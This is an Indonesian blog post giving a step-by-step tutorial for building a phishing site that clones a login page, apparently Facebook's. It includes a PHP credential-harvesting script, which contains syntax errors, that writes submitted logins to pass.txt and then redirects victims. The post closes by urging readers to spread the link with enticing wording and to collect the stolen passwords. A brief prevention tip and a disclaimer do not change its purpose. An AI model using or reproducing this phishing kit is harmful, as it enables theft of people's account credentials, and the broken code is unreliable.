CARA MELAKOKAN FHISHING DENGAN AMPUH

Jumat, 18 Desember 2015

Hello sahabat hackers
     Ini adalah Post pertama saya mohon maaf kalau ada beberapa kata yang kurang berkenan karna saya masih pemula dalam Bloging saya akan terus berlatih dalam menyempurnakan hasil karya saya.
Kali ini saya akan membahas salah satu teknik hacking dengan menggunakan system “Phising” pasti beberapa di antara kalian bertanya-tanya “Apa itu Phising ??”
     Awal-awal ini semakin sering kita mendengar kata “Phising” di berbagai media sosial dan games online. Phising itu sangat membahayakan bagi korbannya. Sekali kita terkena Phising Site pasti account tersebut tak berselang begitu lama langsung terkena Hack dan diganti passwordnya atau account tersebut hanya di salah gunakan, seperti mengganti Foto Profile si korban dengan foto yang kurang layak. Untuk mencegah phising saya menyarankan kalian untuk membaca linknya terlebih dahulu apa link tersebut memiliki sebuah kejanggalan dalam URL linknya dan selain itu jangan pula mudah tertipu dengan iming-iming hadiah atau chas games gratis karna kebayakan para korban tertarik dengan iming iming chas games gratis dan tanpa di sadari mereka telah terkena phising.
Oke back to topic again !!
     Phising adalah salah satu teknik hacker yang sangat mudah di lakukan untuk seorang hacker pemula, untuk melakukan Phising seseorang hacker tidak perlu mempelajari banyak teknik untuk melakukan aksi Phising.Phising adalah teknik di mana seseorang membuat situs website yang mirip dengan aslinya. Teknik ini juga sering di sebut dengan Fake Login (Login tiruan) dimana seseorang masuk ke halaman yang bukan semestinya. Cara kerja Phising adalah saat korban memasukan data account mereka ke situs itu seperti email dan password secara otomatis email korban dan data data yang korban isi tadi akan terekam di database website phising dan sang pemilik website dapat leluasa mengakses account korban. Oke saya akan segera jelaskan bagaimana cara membuat website phising dengan teknik yang sangat mudah
Tutorial Cara Membuat Website Phising
Perlengkapan yang kalian butuhkan untuk membuat website phising :
  • ·         Hosting {Usahakan buat URL yang semirip mungkin dengan Website tiruan}
  • ·         Website yang akan kita jadikan sasaran Phising

Step 1 :

Buka halaman login pada website target seperti pada gambar di bawah ini

Step 2 :

Kemudian setelah agan masuk ke halaman login seperti di atas agan klick kanan dan pilihView page source nanti akan muncul Scriptnya lalu bukalah notepad dan copylah seluruh scriptnya dan pindahkan di notepad yang sebelumny a sudah di buka. Setelah script tersebut di Copy ke notepad kemudian pencet CTRL+F untuk mencari kata kemudian agan masukan kata action lalu ubah kata action tersebut  menjadi secret.php jika sudah selesai kemudian save file tersebut dengan nama index.php
Step 3 :
Lalu buka lagi Notepad baru dan masukan script di bawah ini :
<?php
header("Location: http://www.Facebook.com/login.php ";
$handle =/ fopen("pass.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exite;
?>
Setelah script di atas di masukan simpanlah notepad yang telah bersisi script  di atas dengan nama secret.php
Step 4 :
Buka lembar Notepad baru dan biarkan kosong atau isi dengan hanya memasukan 1 Spasi kemudian simpanlah dengan nama pass.txt
Step 5 :
Tahap ini adalah tahap terakhir dari proses hacking. Setelah kalian selesai mengikuti step demi step di atas upload semua file yang sudah anda buat tadi {secret.php,pass,txt, dan index.php} ke Hosting yang sebelumnya sudah di siapkan sebelumnya. Hostingnya bisa menggunakan www.idhostinger.com atau yang lainnya saya di sini menggunakan idhostinger karna lebih mudah. Upload lah semuanya file yang sudah kita buat tadi setelah di Upload agan bisa cek website yang sudah di buat tadi.
     Tadaaa!! website phising anda sudah siap di gunakan sebarkanlah link website phising anda ke publik dengan menggunakan kata kata yang membuat orang orang tertarik untuk masuk ke link tersebut.
*Untuk melihat password orang orang yang sudah login di website phising anda, anda tinggal cek pass.txt yang sebelumnya sudah di upload

Sekian Tips & Trick dari saya semoga bermanfaat bagi sobat-sobat Cyber Hacker Indonesia :) nantikan postingan saya selanjutnya untuk dapat mengetahui trik & trick lainya mengenai system Hacking dan cara mencegahnya.
Apapun yang terjadi saya pihak dari Cyber Hacker Indonesia tidak bertanggung jawab atas apa yang terjadi

Senin, 14 Desember 2015


Comments

Popular posts from this blog

tutorial cara membuat blog

KOMIK HENTAI LENGKAP